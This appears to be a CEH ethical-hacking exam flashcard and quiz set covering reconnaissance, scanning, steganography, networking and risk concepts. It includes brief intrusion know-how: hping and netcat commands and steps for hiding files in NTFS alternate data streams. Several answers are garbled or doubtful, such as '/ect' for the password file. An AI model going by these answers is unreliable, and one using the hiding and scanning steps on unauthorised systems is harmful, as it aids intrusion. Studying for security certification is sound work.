Collecting Initial Sequence Number

Hping Commands: hping3 192.168.1.103 -Q -p 139 -s

-1

Hping sets ICMP mode

higher level permissions

If the process that is executing this binary is having ___ then the malicious binary also executes under higher level permissions

nbtstat -n

If you want to bring up name table on your machine using NetBIOS.

CareerBuilder.com Monster.com Dice.com

If you want to find information about a company's technical infrastructure you can look where?

nbtstat -c

If you want to show the cache using NetBIOS.

Least Significant Bit Insertion Masking and Filtering Algorithms and Transformation

Image File Steganography Techniques

OpenStego QuickStego CrytaPix Hide In Picture gifshuffle PHP-Class Stream Steganography

Image Steganpgraphy Tools

loading an external dylib (dynamic library)

In OS X, applications while ___, the loader searches for dylib in multiple directories

bit flipping

In ____, the attacker isn't interested in learning the entirety of the plain-text message. Instead, bits are manipulated in the cipher text itself to generate a predictable outcome in the plain text once it is decrypted.

Administrative safeguards

In a risk assessment, data classification and background checks are examples of which type of safeguard?

information is hidden in image

In image steganography, the ___ files of different formats such as .PNG, .JPG, .BMP, etc

Internet DMZ

In networking, it's a controlled buffer network between you and the uncontrolled chaos of the Internet.

black-box testing

In penetration testing, a method of testing the security of a system or subnet without any previous knowledge of the device or network. It is designed to simulate an attack by an outside intruder (usually from the Internet).

Evil Twin

In what type of attack does an attacker set up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID?

Hiding files

In which CEH hacking stage do you use steganography?

send a "SYN" (session establishment)

One way to determine whether a port is open is to ___ packet to the port

E. SOA (Start of Authority)

One way to mitigate against DNS poisoning is to restrict or limit the amount of time records can stay in cache before they're updated. Which DNS record type allows you to set this restriction? A. NS B. PTR C. MX D. CNAME E. SOA

Stealth (also called half-open scan or SYN scan)

Only SYN packets are sent to ports (no completion of the three-way handshake ever takes place).

C. They are mitigating the risk

Organization leadership is concerned about social engineering and hires a company to provide training for all employees. How is the organization handling the risk associated with social engineering? A. They are accepting the risk. B. They are avoiding the risk. C. They are mitigating the risk. D. They are transferring the risk.

bypass firewall

Organizations have security mechanisms that only check incoming ICMP packets but not outgoing ICMP packets, therefore attackers can easily ___.

Conduct

Other than Preparation and Conclusion, what is the third phase of the Software Assurance Maturity Model?

Internet

Outside the boundary and uncontrolled. You don't apply security policies to this zone.

This flag forces the delivery of data to communications.

PSH (Push)

gathering of competitive intelligence using search engines perusing social media sites dumpster dive gaining network ranges raiding DNS information

Passive footprinting methods

SmartWhois Domain Dossier

Perform WHOIS footprinting using tools such as ___ , etc. to create detailed map of organizational network, to gather personal information that assists to perform social engineering, and to gather other internal network details, etc.

eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker

Perform email footprinting using tools such as ___ , etc. to gather information about the physical location of an individual to perform social engineering that in turn may help in mapping target organization's network

Path Analyzer Pro VisualRoute Network Pinger

Perform network footprinting using tool such as ___ , etc. to create a map of the target's network

HTTrack Web Site Copler BlackWidow Webripper

Perform website footprinting using tools such as ___, etc. to build a detailed map of website's structure and architecture

Angry IP Scanner SolarWinds Engineer Toolset's Ping Sweep Colasoft Ping Tool Advanced IP Scanner Visual Ping Tester - Standard Ping Sweep Ping Scanner Pro Network Ping OpUtils Ping Monitor PingInfoView Pinkie

Ping Sweep Tools

locating active devices firewall

Ping scan is useful for ____ or determining if ICMP is passing through a ___

A or AAAA

Points to a host's IP address

MX

Points to domain's mail server

TFTP (UDP)

Port number 69

secretly monitors and records all activities

Power Spy ___ on your computer

Proxy Switcher Proxy Workbench TOR CyberGhost SocksChain Fiddler Burp Suite Proxy Proxifier Protoport Proxy Chain Proxy Tool Windows App ProxyCap Charles CCProxy

Proxy Tools

Doxing

Publishing personally identifiable information about an individual collected from publicly available databases and social media

A)Smurf attack

Recently, your company's security practitioner suggested that you disable all routers from accepting broadcast ping messages. Which type of attack will this protect against? A)Smurf attack B)TCP RST attack C)MITM attack D)OSPF attack

modify the registry, change local admin passwords, disable local accounts

RemoteExec allows attackers to ___, and copy/update/delete files and folders

"all hosts" link local multicast address

Scanning IPv6 network, however, offers a large number of hosts in a subnet if an attacker can compromise one host in the subnet; attacker probe the ___

Nmap

Scanning Tool

dialers port scanners network mappers ping tools vulnerability scanners

Scanning can use what type of tools

IPv6

Scanning in __ networks is more difficult and complex than the IPv4 and also some scanning tools do not support ping sweeps on __ networks

Nmap Angry IP Scanner SolarWinds Engineer Toolset Network Ping OPUtils SuperScan Advanced IP Scanner Pinkie

Scanning tools (ping sweep, etc):

Qualys FreeScan

Scans computers and apps on the Internet or in your network Tests websites and apps for OWASP Top Risks and malware

PsLoggedOn

See who's logged on locally and via resource sharing

bluejacking

Sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, and laptop computers.

Viruses

Social engineering can use all the following except ____ Mobil phones Instant messaging Trojan horses Viruses

Eavesdropping Shoulder surfing Dumpster diving Impersonation on social networking sites

Social engineering techniques:

Adware

Software that has advertisements embedded within it. It generally displays ads in the form of pop-ups.

Guardster Ultrasurf Psiphon Tails

Some anonymizers:

Company websites and employment ads Search engines, Internet, and online DB Press releases and annual reports Trade journals, conferences, and newspaper Patent and trademarks Social engineering employees Product catalogues and retail outlets Analyst and regulatory reports Customer and vendor interviews Agents, distributors, and suppliers

Sources of competitive intelligence

communicate secretly

Spam emails help to ___ by embedding the secret messages in some way and hiding the embedded data in the spam emails

B) UDP 514

Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 514 C) UDP 110 D) TCP 161 E) TCP 514

-Open the command prompt with an elevated privilege -Type the command "type C:\SecretFile.txt > C:\LegitFile.txt:SecretFile.txt" (Here, file is kept in C drive where SecretFile.txt file is hidden inside LegitFile.txt file) -To view the hidden file type "more < C:\SecretFile.txt" (For this you need to know the hidden file name)

Steps to hide file using NTFS

cipher text

Text or data in its encrypted form; the result of plain text being input into a cryptographic algorithm.

sh-compatible shell

The BASH is an ___ which stores command history in a file called bash_history

IDS/Firewall

The IP address decoy technique makes is difficult for the ____ to determine which IP address was actually scanning the network and which IP addresses were decoys

D. DNS poisoning

The IT staff is notified that the company's website has been defaced. A security employee, working from home, visits the site and sees the message "YOU HAVE BEEN HACKED" on the front page. He then reboots the system, VPN's to the internal network, and visits the site again, this time noticing nothing out of place. What is the most likely explanation? A. ARP poisoning B. MAC poisoning C. SQL injection D. DSN poisoning

A)Microsoft Windows

The MBSA vulnerability tool is specifically designed to locate potential exploits in which operating systems? A)Microsoft Windows B)Mac OS X C)Cisco IOS D)UNIX/Linux

Reconnaissance Scanning and Enumeration Gaining Access <-- Escalation of Privileges Maintaining Access Covering Tracks

The Phases of ethical hacking

SYN/FIN Scanning Using IP Fragments

The TCP header is split into several packets so that the packet filters are not able to detect what the packets intend to do

Application Presentation Session

The TCP/IP model Application layer is what in the OSI model layer?

Data Link Physical

The TCP/IP model Network Access layer is what in the OSI model layer?

Transport

The TCP/IP model Transport layer is what in the OSI model layer?

private

The ___ community string is used for read-write.

SAM

The ___ database holds encrypted versions of all the local passwords for accounts on the machine.

performance and CPU optimizations

The ___ in the processors such as branch prediction, out of order execution, caching, and speculative execution lead to these vulnerabilities

preparation

The ___ phase defines the time period during which the actual contract is hammered out. The scope of the test, the types of attacks allowed, and the individuals assigned to perform the activity are all agreed upon .

conclusion or post-assessment

The ___ phase defines the time when final reports are prepared for the customer, detailing the findings of the tests (including the types of tests performed) and many times even providing recommendations to improve security.

Accountability

The ability to trace actions performed on a system to a specific user or system entity.

Hacktivism

The act or actions of a hacker to put forward a cause or a political agenda, to affect some societal change, or to shed light on something he feels to be a political injustice. These activities are usually illegal in nature.

Refresh time

The amount of time a secondary DNS server will wait before asking for updates. The default value is 3,600 seconds (1 hour).

Retry time

The amount of time a secondary server will wait to retry if the zone transfer fails. The default value is 600 seconds.

escalate privileges

The attacker can ______ to obtain complete control of the system. In the process, intermediate systems that are connected to it are also compromised

Continuing access Unnoticed and uncaught

The attacker's intentions include: ____ to the victim's system, remaining ____, deleting evidence that might lead to his prosecution

Discretionary access control (DAC)

The basis of this kind of security is that an individual user, or program operating on the user's behalf, is allowed to specify explicitly the types of access other users (or programs executing on their behalf) may have to information under the user's control.

least Significant Bit Insertion

The binary data of the message is broken and inserted into the LSB of each pixel in the image file in a deterministic sequence

Availability

The condition of a resource being ready for use and accessible by authorized users.

Transformation

The data is embedded in the cover image by changing the coefficients of a transform of an image

Active Directory (AD)

The directory service created by Microsoft for use on its networks. It provides a variety of network services using Lightweight Directory Access Protocol (LDAP), Kerberos-based authentication, and single sign-on for user access to network-based resources.

A)All of these

The following access list is applied to an interface on a Cisco router: access-list 1 permit 192.168.5.0 0.0.255.255 access-list 1 deny host 192.168.5.2 Which of the following IP addresses would be allowed through the interface? A)All of these B)192.168.5.2 C)None of the above D)192.168.7.20 E)192.168.10.60 F)192.168.5.5

Expire time

The maximum amount of time a secondary server will spend trying to complete a zone transfer. The default value is 86,400 seconds (1 day).

TTL (Time To Live)

The minimum for all records in the zone. If not updated by a zone transfer, the records will perish. The default value is 3,600 seconds (1 hour).

B)False positive

The new NIDS (Network Intrusion Detection System) recently prevented a user from accessing resources remotely to which he should have access. Which type of alert does this represent? A)True negative B)False positive C)True positive D)False negative

C) HTTP tunneling

The penetration team is separated from potential targets by firewall; however a penetration test member discovers port 80 is open. Which of the following techniques is the best choice to attempt sending data and/or commands to a target system behind the firewall? A) MAC flooding B) Session splicing C) HTTP tunneling D) Firewalking

unique number

The second half of the MAC address is a _____ burned in at manufacturing to ensure no two cards on any given subnet will have the same address.

B)Classify and prioritize

The security professionals working for your company have designed the procedures for incident handling and response. Today you received a notification of a virus infection. You successfully analyze the virus infection that has affected only your company's file servers. What is the next step you should complete? A)Contain B)Classify and prioritize C)Notify D)Investigate

Reconnaissance

The steps taken to gather evidence and information on the targets you want to attack.

Netcat

Tool for banner grabbing:

Tenable's Nessus Retina CS Microsoft Baseline Security Analyzer (MBSA) GFI LanGuard Qualys FreeScan OpenVAS

Vulnerability scanners:

LanWhoIs HotWhois Batch IP Converter ActiveWhois CallerIP WhoisThisDomain Whois Lookup Multiple Addresses SoftFuse Whois WhoIs Analyzer Pro Whois Domain Dossier Whois BetterWhois DNSstuff Whois Online Network Solutions Whois Web Wiz WebToolHub Network-Tools.com UltraTools

WHOIS Lookup Tools

Regional Internet Registries personal information of domain owners

WHOIS databases are maintained by ____ and contain the _____.

Domain name details Contact details of domain owner Domain name servers NetRange When a domain has been created Expiry records Records last updated

WHOIS query returns:

WebSite-Watcher VisualPing Follow That Page Versionista WatchThatPage OnWebChange

Web Updates Monitoring Tools

download a website to a local directory

Web mirroring tools allow you to ___, building recursively all directories, HTML, images, flash, videos, and other files from the server to your computer

HTTrack (www.httrack.com) Black Widow (http://softbytelabs.com) WebRipper (www.calluna-software.com) Teleport Pro (www.tenmax.com) GNU Wget (www.gnu.org) Backstreet Browser (http://spadixbd.com)

Web site mirroring tools:

B. Layer 4

What OSI layer does SSL operate in? A. Layer 7 B. Layer 4 C. Layer 3 D. Layer 2

Frame

What PDU is at Layer 2 of OSI model

Packet

What PDU is at Layer 3 of OSI model

Segment

What PDU is at Layer 4 of OSI model

RFC 5952

What RFC addresses IPv6 truncation?

Web spiders

What are applications that crawl through a website, reporting information on what they find?

HTTrack Web Site Copier SurfOffline BlackWidow PageNest NCollector Studio Backstreet Browser Website Ripper Copier Offline Explorer Enterprise Teleport Pro GNU Wget Portable Offline Browser Hooeey Webprint

What are some Mirroring tools available with the two most popular first?

Make activity on the Internet untraceable Allow you to bypass Internet censors

What can anonymizers do?

D)Perform testing through a firewall

What can network vulnerability scanners NOT do? A)Find wired and wireless network vulnerabilities B)Scan for open ports and listening services C)Find operating system and security configuration weaknesses D)Perform testing through a firewall

Service oriented architecture (SOA) vulnerability

What class of vulnerability is an XML denial of service attack?

1) # nc -vv www.juggyboy.com 80 (press ENTER) 2) GET / HTTP/1.0 (press ENTER twice)

What command is used for Banner Grabbing using Netcat?

tshark

What command launches a CLI version of Wireshark?

traceroute tracert

What command line tool can help map a network, and tracks a packet across the Internet and provides the route path and transit times?

nslookup

What command line tool is used to query DNS servers for information?

set query=mx

What command would you use to tell nslookup to find records on e-mail servers?

Cain & Abel

What common tool can be used for launching an ARP poisoning attack?

1) Host is not alive 2) Host might not respond to ICMP

What could a nonresponse to ICMP indicate?

Logs

What could be used to monitor application errors and violations on a web server or application?

Hub

What device will neither limit the flow of traffic not have an impact on the effectiveness of sniffing?

B) Time exceeded

What does ICMP type 11, code 0, indicate? A) Redirect B) Time exceeded C) Echo Request D) Echo return

Server's public key

What does a client use to encrypt the session key in an SSL connection?

Destination unreachable, because the router has no route to the network on which the destination resides

What does an ICMP Type 3/Code 6 error message indicate?

C)Displays current firewall settings at a high level

What does the command netsh firewall show config do? A)Enables Windows firewall B)Provides an option to add rules to the configuration C)Displays current firewall settings at a high level D)Displays all rules within Windows Firewall

Ports

What does the enumeration phase not discover?

D. It defines the location of the Snort rules.

What does this line from the Snort configuration file indicate? var RULE_PATH c:\etc\snort\rules A. The configuration variable is not in the proper syntax. B. It instructs the Snort engine to write rule violations in this location. C. It instructs the Snort engine to compare packets to the rule set named "rules." D. It defines the location of the Snort rules.

C) AES

What encryption standard does WPA2 use? A) RC4 B) RC5 C) AES D) SHA-1

A)NTFS

What file system is the alternate data streams (ADS) vulnerability designed to exploit? A)NTFS B)VMFS C)FAT D)UFS

C. SYN/ACK

What flag or flags are sent in the segment during the second step of the TCP three-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK/FIN

Risk mitigation

What happens when a control is implemented to reduce the impact of a risk?

Risk acceptance

What happens when no control is used to address a particular risk?

Asymmetric routing

What is called when traffic between point A and point B takes one route to get there and another to return?

A vulnerability exposed in the OpenSSL cryptographic library allowing attackers to steal server private keys and user session cookies and passwords.

What is heartbleed?

Buffer overflow

What is it called when a program, while writing data to memory, overruns the memory boundary and overwrites adjacent memory locations?

Tailgating

What is it called when an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system?

ACK

What is missing from a half-open scan?

Difficult to install

What is not a benefit of hardware keyloggers?

A vulnerability exposed in the Unix Bash shell allowing attackers to execute arbitrary commands.

What is shellshock?

Reused code that still contains vulnerabilities

What is shrinkwrap code?

technology platforms employee details login pages intranet portals

What is some of the information extracted during Footprinting through Search Engines?

The Computer emergency response teams (CERT) are expert groups that handle computer security incidents.

What is the CERT?

0xffffffffffff

What is the Layer 2 Ethernet broadcast address?

C) FF:FF:FF:FF:FF:FF

What is the MAC address in broadcast frames? A) AA:AA:AA:AA:AA:AA B) 11:11:11:11:11:11 c) FF:FF:FF:FF:FF:FF D) 99:99:99:99:99:99

dig @server name type server = name or IP of the DNS name server name = name of the resource you're looking for type = the type of record you want to pull

What is the basic syntax for using dig?

C)512-bit blocks with an output of 160 bits

What is the block and output size of SHA1? A)1088-bit blocks with an output of 256 bits B)1024-bit blocks with an output of 256 bits C)512-bit blocks with an output of 160 bits D)512-bit blocks with an output of 128 bits

D)191.43.167.255

What is the broadcast address for the subnet 191.43.164.0/22? A)191.43.255.255 B)191.43.164.255 C)191.43.165.255 D)191.43.167.255

protocol.field operator value

What is the generic syntax of a Wireshark filter?

To evade detection by the IDS

What is the goal of session fragmentation and session splicing attacks?

investigating web resources and competitive intelligence mapping out network ranges mining whois and DNS social engineering e-mail tracking Google hacking

What is the logical flow that footprinting follows?

End-user training

What is the most efficient protection control against a social engineering attack?

Operating system and version

What is the most valuable information you can gain from a banner grab?

Steganography

What is the term for hiding messages or information within other non-secret text or data?

Key escrow

What is the term for placing copies of private keys used to encrypt data in the safekeeping of a third party organization?

Residual risk

What is the term for risk that sill exists after security controls have been applied?

Factorization

What is the term for the decomposition of a value into a product of other values that give the original value when multiplied together?

Redundancy or fault tolerance

What is the term for the implementation of backup systems to prevent loss of access to resources?

D)Factorization

What is the term for the process of determining two numbers that can be multiplied together to equal a given starting value? A)Trapdooring B)Derivation C)Hashing D)Factorization

Vulnerability linkage

What is the term for the process of identifying sets of vulnerabilities that can be used to penetrate a network?

War chalking

What is the term for writing wireless access information on the side of a building?

The opening of a TCP connection

What is the three-way handshake?

To fill the MAC table with nonexistent MAC addresses, causing the switch to flood all frames out all interfaces and allowing the attacker to receive frames normally not allowed to see

What is the ultimate goal of a MAC flood attack?

Cookie

What is used to store session information?

C)Public key

What item is contained in the digital certificate that that enables the receiver of the certificate to send an encrypted email to the sender? A)Private key B)Signature C)Public key D)Serial number

Business of functional manager

What job role is in charge of ensuring systems and information assets for a unit are used to accomplish business objectives?

Facilities manager

What job role is on charge of addressing physical risks to the facility?

Get recipient's system IP address Geolocation of the recipient When the email was recieved and read Whether or not the recipient visited any links sent to them Get recipient's browser and operating system information Time spent on reading the emails

What kind of information can be gathered through email tracking?

Network Access

What layer of the TCP/IP model has the following protocols: ARP, L2TP, STP, HDLC, FDDI, Etc.?

Application

What layer of the TCP/IP model has the following protocols: HTTP, FTP, SNMP, SMTP, DNS, POP, IMAP, NNTP, Telnet, SSH, DHCP, etc.

Internet

What layer of the TCP/IP model has the following protocols: IP, ICMP?

Transport

What layer of the TCP/IP model has the following protocols: TCP, UDP?

Encryption

What may be helpful in protecting the content on a web server from being viewed by unauthorized personnel?

C. By manipulating the Time-To-Live (TTL) parameter

What method does traceroute use to map routes traveled by a packet? A. By carrying a hello packet in the payload, forcing the host to respond B. By using DNS queries at each hop C. By manipulating the Time-To-Live (TTL) parameter D. By using ICMP Type 5, Code 0 packets

Promisccuous Mode

What mode must be configured to allow a NIC to capture all traffic on the wire?

netstat -an

What netstat command displays all connections and listening ports, with addresses and port numbers in numerical form.

National Institute of Standards and Technology (NIST)

What organization has as its official mission to promote U.S. innovation and industrial competitiveness?

C) /ect

Where is the password file kept on a Linux machine? A) /dev B) /config C) /ect D) /com

D. Calling the company's help desk line E. Employing passive sniffing

Which of the following activities are not considered passive footprinting? (Choose two.) A. Dumpster diving B. Reviewing financial sites for company information C. Clicking links within the company's public website D. Calling the company's help desk line E. Employing passive sniffing

B)Mitigate C)Accept E)Avoid

Which of the following are acceptable methods for handling risk? (Choose all that apply.) A)Ignore B)Mitigate C)Accept D)Reject E)Avoid

B. Enable DHCP snooping on the switch. D. Configure DHCP filters on the switch.

Which of the following are the best preventive measures to take against DHCP starvation attacks? (Choose two.) A. Block all UDP port 67 and 68 traffic. B. Enable DHCP snooping on the switch. C. Use port security on the switch. D. Configure DHCP filters on the switch.

A) They are used to identify networks C) They can be a maximum of 32 characters

Which of the following are true regarding SSIDs? A) They are used to identify networks B) They are used to encrypt traffic on networks C) They can be a maximum of 32 characters D) They can be a maximum of 16 characters

B) It is used to encryption of passwords on Windows NT machines D) It uses a 128 bit key

Which of the following are true regarding Syskey? (Choose all that apply) A) It is used in encryption of passwords on certain Linux systems B) It is used to encryption of passwords on Windows NT machines C) It uses a 256 bit key D) It uses a 128 bit key

A)Theft of a password by a coworker or remote contractor

Which of the following attacks can NOT be effectively mitigated by file permissions? A)Theft of a password by a coworker or remote contractor B)Posing as the server after a successful authentication to gain access to data C)Intercepting and modifying unsigned SMB packets to gain access to data D)Posing as the client machine after a successful authentication to gain access to data

A. XSS

Which of the following attacks lets you assume a user's identity at a dynamically generated web page? A. XSS B. SQL Injection C. Session Hijacking D. Zone transfer

B)ARP poisoning

Which of the following attacks occurs at the Data Link layer of the OSI model? A)IP address spoofing B)ARP poisoning C)Rogue DHCP server D)Cross-site scripting

A) Using a protocol in a way it was not originally intended to be used

Which of the following best defines "covert channel"? A) Using a protocol in a way it was not originally intended to be used B) An application using a port that is not well known C) A hacker using a browser to look at the company's public website D) A wireless connection

A) Using a protocol in a way it was not originally intended to be used

Which of the following best defines "covert channel"? A) Using a protocol in a way not originally intended to be used B) An application using a port that is not well known C) A hacker using a browser to look at the company's public website D) A wireless connection

B. Security tokens

Which of the following best defines a logical or technical control? A. Air conditioning B. Security tokens C. Fire alarms D. Security policy

B. Injecting parameters into a connection string using semicolons as separators

Which of the following best describes a connection stream parameter pollution attack? A. Injecting the same name into multiple parameters within an HTTP request B. Injecting parameters into a connection string using semicolons as separators C. Adjusting session identifiers to explicit, known values D. Injecting JavaScript code into multiple input parameters

Directory traversal

Which of the following is used to access content outside the root of a website?

B. An external DNS server is Active Directory integrated.

Which of the following may be a security concern for an organization? A. The internal network uses private IP addresses registered to an Active Directory--integrated DNS server. B. An external DNS server is Active Directory integrated. C. All external name resolution requests are accomplished by an ISP. D. None of the above.

D) All of the above

Which of the following may be used in a fully switched subnet to improve sniffing efforts? A) MAC Flooding B) ARP Spoofing C) Span Ports D) All of the above

IP DHCP Snooping

Which of the following prevents ARP poisoning?

B)SOAP

Which of the following protocols or standards formats information in XML? A)CORBA B)SOAP C)DCOM D)OLE

A) Common Criteria

Which of the following refers to an international standard that provides a set of requirements for evaluation? A) Common Criteria B) ISO 9600 C) DEV 201 Series D) The Blue Book

A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies

Which of the following represents EC-Council's scanning methodology? A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies B) Check for open ports, check for live systems, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies C) Perform banner grabbing, check for live systems, check for open ports, scan for vulnerabilities, draw network diagrams, and prepare proxies D) Draw network diagrams, check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, and prepare proxies

D)Sensitive information was obtained from a stolen company laptop

Which of the following scenarios could be prevented by using EFS? A)DDoS attack makes the network inaccessible for four hours B)Thieves breaking into the server room and damaging the servers C)Sensitive data captured with a sniffer during transmission D)Sensitive information was obtained from a stolen company laptop

C)Conducting security assessments on network resources

Which of the following security actions is intended to validate existing systems? A)Recording the steps taken when upgrading network servers. B)Deploying a new configuration to a router C)Conducting security assessments on network resources D)Assigning responsibilities to the technical team

A)Auditing

Which of the following security tools should be examined before implementation to gauge its effects on performance? A)Auditing B)Vulnerability scanner C)Wireless sniffer D)Antivirus software

C) Defense in depth

Which of the following sets up many, varying security controls to protect an organization's IT resources? A) Single sign-on B) Overt channels C) Defense in depth D) Multilayer firewall

A)Network range of protected IP addresses B)Excluded rule files

Which of the following settings can be specified in the Snort configuration file? (Choose all that apply.) A)Network range of protected IP addresses B)Excluded rule files C)XOR encoders for NOPS D)FIN, URG and PUSH flags for TCP headers

C. Technical details and procedures

Which of the following should not be included in a security policy? A. Policy exceptions B. Details on noncompliance disciplinary actions C. Technical details and procedures D. Supporting document references

C) UDP 514

Which of the following standard ports must be opened on the firewall to allow log messages to be sent to a log analysis tool? A) UDP 123 B) TCP 123 C) UDP 514 D) TCP 514

C)Most serious threat the organization faces

Which of the following statements BEST describes disgruntled employees? A)Less of a threat than black hat hackers, but more of a threat than gray hat hackers B)Less of a threat than gray hat hackers, but more of a threat than white hat hackers C)Most serious threat the organization faces D)Pose no threat to the organization

A)They invented RSA encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption

Which of the following statements are FALSE with regard to Whitfield Diffie and Martin Hellman? (Choose all that apply.) A)They invented RSA encryption B)They invented public key encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption

A)It was replaced by the program ipchains C)It controls the packet filter or firewall capabilities

Which of the following statements are true of the program ipfwadm? (Choose all that apply.) A)It was replaced by the program ipchains B)It is a program written for Windows C)It controls the packet filter or firewall capabilities D)It has additional code that filters for fragmented packets

C)It is a form of mutual authentication.

Which of the following statements is NOT true about RSA SecurID? A)It uses a password only once. B)It is a form of two-factor authentication. C)It is a form of mutual authentication. D)Passwords stolen through a phishing attacks will fail.

D. Port scanning is used to identify potential vulnerabilities on a target system.

Which of the following statements is true regarding port scanning? A. Port scanning's primary goal is to identify live targets on a network. B. Port scanning is designed to overload the ports on a target in order to identify which are open and which are closed. C. Port scanning is designed as a method to view all traffic to and from a system. D. Port scanning is used to identify potential vulnerabilities on a target system.

C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step.

Which of the following statements is true regarding the TCP three-way handshake? A. The recipient sets the initial sequence number in the second step. B. The sender sets the initial sequence number in the third step. C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step. D. When accepting the communications request, the recipient responds with an acknowledgment and a randomly generated sequence number in the third step.

D)Security policies are technology specific.

Which of the following statements regarding security policies is NOT true? A)Security policies reduce legal liability to third parties. B)Security policies protect companies from threats. C)Security policies protect confidential and proprietary information. D)Security policies are technology specific.

B)Take ownership of a file

Which of the following tasks cannot be performed using cacls.exe, but is supported by xacls.exe? A)Display permissions to a file B)Take ownership of a file C)Modify an ACL D)Assign permissions to a folder

D)John the Ripper

Which of the following technical assessment tools is used to test passwords for weakness? A)Tripwire B)Snort C)Nmap D)John the Ripper

A)Prone to a man-in-the-middle attacks E)Maps 48-bit addresses to 32-bit addresses

Which statements are true of ARP? (Choose two.) A)Prone to a man-in-the-middle attacks B)Maps 48-bit addresses to host names C)Resistant to man-in-the-middle attacks D)Maps 32-bit addresses to host names E)Maps 48-bit addresses to 32-bit addresses

The last step involves returning any systems to their state prior to the pen test, which can include removing or cleaning up user accounts created externally as a result of the test (Clearing Tracks)

Which step in a penetration test is sometimes called "cleaning up"?

Disgruntled employees

Which threat agent poses the biggest threat to the disclosure of sensitive data?

C)Disclosure of sensitive data

Which threat poses the highest impact to the organization by a disgruntled employee? A)Introduction of stress into the work environment B)Negative effect on morale C)Disclosure of sensitive data D)Low productivity

XCACLS.exe

Which tool can take ownership of a file from the Windows command line?

fragroute

Which tool is used to intercept, modify, and rewrite egress traffic destined for the specified host in such a way that a NIDS cannot recognize the attack signatures?

D)WirelessMon E)Vistumbler F)NetStumbler

Which tool(s) are used to discover a nearby Wi-Fi network or device? (Choose all that apply.) A)Skyhook B)AirPcap C)Wireshark D)WirelessMon E)Vistumbler F)NetStumbler

B)Botnet zombies

Which trait differentiates a DoS attack from a DDoS attack? A)Injected code B)Botnet zombies C)Spoofed IP address D)SYN flood

Point-to-Point Protocol (PPTP)

Which tunneling protocol operates at the Data Link layer and uses Microsoft Point-to-Point Encryption (MPPE) to protect the connection?

A)Provide third party access to data B)Facilitate recovery operations

Which two of the following are goals of key escrow agreements? A)Provide third party access to data B)Facilitate recovery operations C)Enhance the security of public keys D)Enhance the security of private keys

B. TCP 53

You are told to monitor a packet capture for any attempted DNS zone transfer. Which port should you focus your search on? A. TCP 22 B. TCP 53 C. UDP 22 D. UDP 53

D)Deploy the smart cards to control building access and the biometrics to control data center access.

You must design physical security for a new building your company is building. You need to select the appropriate physical control for the building itself, for the network wiring closets, and for the data center located in the building. You have been given the funds to implement smart cards and biometrics. You need to keep the cost of these systems as low as possible. Where should you deploy these systems? A)Deploy the biometrics to control building access and the smart cards to control data center access. B)Deploy the biometrics to control building access and the smart cards to control wiring closet access. C)Deploy the smart cards to control building access and the biometrics to control wiring closet access. D)Deploy the smart cards to control building access and the biometrics to control data center access.

B)Bluebugging D)SMiShing F)Jailbreaking/rooting

You must determine the possible vulnerabilities that could be exploited on your company's mobile devices. Which of the following attacks are ONLY targeted at mobile platforms? (Choose all that apply.) A)Drive-by downloading B)Bluebugging C)Man-in-the-middle D)SMiShing E)Clickjacking F)Jailbreaking/rooting

A)Validate all inputs C)Protect data D)Implement appropriate access controls F)Implement error and exception handling G)Encode data

You must work with application designers to ensure that a new Web application adheres to OWASP's Top 10 Proactive Controls. Which of the following are part of this? (Choose all that apply.) A)Validate all inputs B)Implement detailed error messaging C)Protect data D)Implement appropriate access controls E)Disclose data F)Implement error and exception handling G)Encode data

A)x86/opty2

You need to create a NOP slide using the Metasploit Framework. Which module should you use? A)x86/opty2 B)0xf3af1000 C)x86/xor D)0xd503201f

A)PGP

You need to deploy an asymmetric encryption mechanism that will sign, encrypt, and decrypt emails to increase the security of e-mail communications. Which encryption mechanism should you implement? A)PGP B)IPSec C)3DES D)SHA1

D)Netstumbler

You need to detect 802.11b wireless networks in the area. Which product should you use? A)AirSnort B)Retina C)Network Mapper D)Netstumbler

C)Fragmenting the attack payload

You need to determine how attackers can evade an intrusion detection system (IDS). Which of the following best describes session splicing? A)Spoofing the attack source B)Encoding the attack payload C)Fragmenting the attack payload D)Disabling the attack target

B)Router ACL

You need to ensure that malicious packets are prevented from entering your private network. Packets should be evaluated based on the following criteria: -Source IP addresses -Protocol and port number Which type of security tool will use only these criteria to deny access? A)NTFS permissions B)Router ACL C)NIPS D)NIDS

B. Closed

You receive a RST-ACK from a port during a SYN scan. What is the state of the port? A. Open B. Closed C. Filtered D. Unknown

Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops

You run the following command: nmap -p21,80,443 -sV -O 45.33.32.156 What is the most likely partial output? A) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https B) Host is up (0.029s latency). Not shown: 992 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 135/tcp filtered msrpc 443/tcp filtered https C) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops D) Host is up (0.029s latency). PORT STATE SERVICE 21/tcp closed ftp 80/tcp open http 443/tcp filtered https

D. sc query state=all

